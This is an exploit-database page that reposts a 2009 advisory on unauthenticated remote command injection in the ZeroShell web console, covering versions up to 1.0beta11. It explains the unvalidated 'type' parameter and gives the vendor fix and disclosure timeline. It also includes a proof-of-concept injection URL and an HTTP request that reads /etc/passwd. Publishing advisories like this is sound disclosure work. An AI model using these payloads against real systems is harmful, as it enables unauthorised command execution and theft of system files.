0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability
[==========================================================
ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability
==========================================================
ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution
for servers and embedded devices. This Linux distro can be configured
and managed with an easy to use web console.
ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this
weakness in order to compromise the entire system.
Authentication is not required in order to exploit this flaw.
[Proof of Concept]
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: <IP>
----------------------------------------------
Original Advisory:
========================================================================
ZeroShell <= 1.0beta11 Remote Code Execution
========================================================================
Affected Software : ZeroShell <= 1.0beta11
Severity : High
Local/Remote : Remote
Author : Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com
Advisory URL : http://www.ikkisoft.com/stuff/LC-2009-01.txt
[Summary]
ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution
for servers and embedded devices. This Linux distro can be configured
and managed with an easy to use web console.
ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this
weakness in order to compromise the entire system.
Authentication is not required in order to exploit this flaw.
[Vulnerability Details]
The ZeroShell web console uses a CGI program and several bash scripts
to provide all administrative functions. An improper input validation
mechanism permits the injection of arbitrary system commands.
An unauthenticated user may invoke a function to retrieve all x509
certificates present in the repository, using the following GET request:
https://<IP>/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=user
The parameter "type" is used to distinguish between users, CA and host
certificates. Unfortunately, this parameter is passed to the following
code without input validation at all:
<-- cut here -->
TYPE="$1"
cd "$SSLDIR/certs" || exit 1
ls *_${TYPE}.pem |awk -F"_$TYPE.pem" -v"TYPE=$TYPE" '{
<-- cut here -->
An aggressor may easily escape the hardcoded commands, adding arbitrary
system commands. According to the default system configuration, these
commands are executed as "apache" (low privileges user).
[Proof of Concept Exploit]
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: <IP>
[Fix Information]
The vendor has published a patch for the release 1.0beta11 only.
http://www.zeroshell.net/eng/patch-details/#C100
The new release (1.0beta12) will be available soon.
[Time Table]
08/01/2009 - Vendor notified.
08/01/2009 - Vendor response.
11/01/2009 - Vendor patch release.
09/02/2009 - Public disclosure.
[Legal Notices]
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
Permission is hereby granted for the redistribution of this alert,
provided that the content is not altered in any way, except
reformatting, and that due credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
# 0day.today [2024-12-27] #